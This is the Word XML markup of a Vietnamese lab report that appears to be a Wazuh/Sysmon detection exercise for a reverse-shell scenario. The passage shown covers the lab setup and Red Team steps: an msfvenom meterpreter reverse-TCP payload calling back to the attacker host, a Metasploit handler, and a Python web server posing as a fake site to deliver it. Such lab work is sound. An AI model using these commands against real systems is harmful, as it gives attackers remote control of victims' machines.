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3811" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc234664932"/>
      <w:r w:rsidRPr="00552F82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kịch bản 5:  REVERSE SHELL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="44C144EE" w14:textId="77777777" w:rsidR="009D6A35" w:rsidRDefault="009D6A35" w:rsidP="009D6A35">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A99814" w14:textId="4EF5BF86" w:rsidR="009D6A35" w:rsidRPr="009D6A35" w:rsidRDefault="009D6A35" w:rsidP="009D6A35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A1ACD7" wp14:editId="3D505C67">
            <wp:extent cx="5733415" cy="1739900"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1005382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3">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="11669" b="42657"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1739900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1934E" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="160"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc234664933"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Mô tả tình huống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="213CFAD8" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing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Kẻ tấn công thông qua một lỗ hổng ứng dụng web (RCE, File Upload, LFI) để tải lên mã độc webshell, hoặc lừa người dùng chạy mã độc nhằm thực thi lệnh PowerShell/Bash thiết lập một kết nối ngược (Reverse Shell) về máy chủ C2 (Command &amp; Control) của hacker. Mục đích nhằm duy trì quyền truy cập ổn định, bỏ qua cơ chế ngăn chặn luồng vào của Firewall thông thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6FEC56" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"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CDB3B60" wp14:editId="71819ADA">
            <wp:extent cx="5730875" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="image39.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="29" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA7E1A" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_heading=h.yjy45deap4z8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="65" w:name="_Toc234664934"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Mô hình Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style105"/>
        <w:tblW w:w="8190" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2820"/>
        <w:gridCol w:w="3030"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D3737" w14:paraId="1C90F991" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="688"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="265483A3" w14:textId="77777777" w:rsidR="000D3737"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Máy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="134AD60A" w14:textId="77777777" w:rsidR="000D3737"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Hệ điều hành</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3901FE99" w14:textId="77777777" w:rsidR="000D3737"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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="7627D28C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00C2FC2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Wazuh Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="535135A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Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6D83D8FA"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192.168.174.25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="36AFC658" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70C53C1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Kali Linux (Attacker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="599E581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Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2AA5D38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192.168.174.132</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="2690BC02" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1058E69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Windows Server (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D926F9E"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Windows Server 2019/2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="35D0CE8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192.168.174.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="198968D4" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47874729" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_heading=h.bc5fy5fbb9w0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="67" w:name="_Toc234664935"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2. Chuẩn bị môi trường</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="2BC1C7F0" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44200613" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">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Máy Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B95D01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các service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D8767"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systemctl status wazuh-manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68207453" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401B824C"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systemctl status wazuh-indexer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6277E5" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9E87AD"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systemctl status wazuh-dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C7B88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Đảm bảo đều là</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FE4A11"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active (running)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C24CC" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCC8FE9" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">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Máy Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9A36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Cài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE8461"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Wazuh Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E94E8A"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Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1176BAAF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E4880C"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Get-Service Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443E360"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phải là Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76C61D" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>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Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369AF571" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C6BEA6"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Get-Service Sysmon64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708CD4E5" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_heading=h.26649agdba3h" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="69" w:name="_Toc234664936"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3. Chuẩn bị Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="65D0594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Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE4EB8"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sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E8C5D"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Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB8302"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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDB88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chưa có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD9E04"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sudo apt install metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3BA0D"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msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182539D9"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msfvenom --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67290B5A" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA56D83" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_heading=h.qz9fucbh1jo5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="71" w:name="_Toc234664937"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4. Các bước thực hiện tấn công (Red Team)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="6167110E"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Trên Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A063774"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mkdir ReverseShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A3029" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6678A0"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cd ReverseShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092E62F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Tạo payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397C3E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msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.174.132 LPORT=4444 -f exe -o payload.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004409EF"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thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3DB718"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payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A5E012"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sẽ xuất hiện trong thư mục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91FE4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41E9A41" wp14:editId="7510693B">
            <wp:extent cx="5730875" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89" name="image101.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="89" name="image101.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="901700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D51801" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Mở Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E069DE6"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Mở</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE481F4"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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5A622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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49745D51" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="12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msfconsole # đây là lệnh mở metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CBCAD" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="12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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F00EE" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="12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set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E37A43" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="12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set LHOST 192.168.174.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D620FA" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="12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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BBD8FB"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exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7FFDF0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483D911E"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Started reverse TCP handler...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF4F6D3"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Lúc này Kali đang chờ Victim kết nối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADEF11" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tạo Website giả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9471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Mở Terminal thứ hai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E987D0" w14:textId="77777777" w:rsidR="000D3737" w:rsidRPr="001030E8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="72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cd ReverseShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C0875"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Chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD5ECD"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python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AA055"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11A1F06D" wp14:editId="0C913FF8">
            <wp:extent cx="5730875" cy="8763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23" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="876300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4985D01E"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Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DF6AD"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http://192.168.174.132:8000</w:t>
      </w:r>
    </w:p>
